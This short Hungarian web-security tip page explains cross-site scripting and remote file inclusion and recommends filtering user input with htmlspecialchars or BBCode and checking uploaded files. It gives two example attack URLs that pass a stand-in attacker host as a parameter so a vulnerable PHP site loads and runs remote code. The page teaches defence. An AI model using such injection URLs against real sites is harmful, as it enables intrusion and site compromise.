Ha alert ablak jön fel, akkor le kell védeni a mezőt, a HTML tagokat szűrni kell.
Ezzel a támadással komplett weboldalakat tudnak tönkretenni védekezz ellene !Gyakori eset, hogy az oldal URL-hez hívnak be egy más oldalon lévő fájlt. ( url injection )
Pl: http://oldalad.hu/index.php?valami=http://támadóoldala.com/valami.kitejesztés???
Vagy: http://oldalad.hu/index.php?_SERVER[DOCUMENT_ROOT]=http://támadóoldala.com/valami.kiterjesztés?
Ezekben a fájlokban ( Ez természetesen lehet .PHP, .HTML, .HTM, .txt..... ) fájl is ) egy PHP program fut le, ami információhoz juttatja a támadót.
Ezek a fájlok nem biztos, hogy mindig a támadó vagy rossz szándékú felhasználó weboldalán vannak. A gyakorlat azt mutatja, hogy egy sebezhető, nem ellenőrzött oldalra rakják fel a fájlt, a tulajdonos tudta nélkül, így kihasználva a honlapot. Fontos tehát ha az oldalra fájlt tölthetnek fel a felhasználók akkor mindenképp ellenőrzött tartalom, méret és kiterjesztés legyen. Ezzel a módszerrel az oldalad sebezhetőségét térképezik fel, majd egy JavaScriptet szúrnak be az oldalba. Ez a skript a gyökérkönyvtár összes létező fájl állományába bemásolja önmagát másodpercek alatt. Ha az oldalon van naplózás érdekes próbálkozásokat láthatsz.
Ha az oldalon van olyan adat amit felhasználó jelentet meg szűrni kell, továbbá minden URL adatot is le kell védeni !
Ezt megteheted
htmlspecialchars
vagy BBCode használatával.
Több infó a
Google-n.
- Értékelés betöltése 4.00-6
- 1
- 2
- 3
- 4
- 5
- 6
Átlag: 4.0 (70 szavazat összesen)